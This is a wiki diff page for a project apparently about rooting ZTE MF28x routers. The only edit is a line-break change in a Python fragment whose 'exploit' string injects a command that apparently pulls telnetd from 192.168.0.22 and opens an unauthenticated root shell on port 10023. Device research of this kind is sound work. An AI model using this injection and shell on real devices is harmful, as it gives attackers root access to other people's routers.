projects:zte_mf28x

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
projects:zte_mf28x [2024/08/07 10:33] Andreas Böhlerprojects:zte_mf28x [2026/04/25 13:13] (current) Andreas Böhler
Line 240: Line 240:
             return False             return False
                  
-        exploit = ";zte_debug.sh 192.168.0.22 telnetd; /tmp/telnetd -l /bin/sh -p 10023; sleep 3600\n"           out = bytearray()+        exploit = ";zte_debug.sh 192.168.0.22 telnetd; /tmp/telnetd -l /bin/sh -p 10023; sleep 3600\n" 
 +        out = bytearray()
         for char in exploit:         for char in exploit:
             if char != '\n' or char != '\t' or char != '\0':             if char != '\n' or char != '\t' or char != '\0':
  • projects/zte_mf28x.1723019587.txt.gz
  • Last modified: 2024/08/07 10:33
  • by Andreas Böhler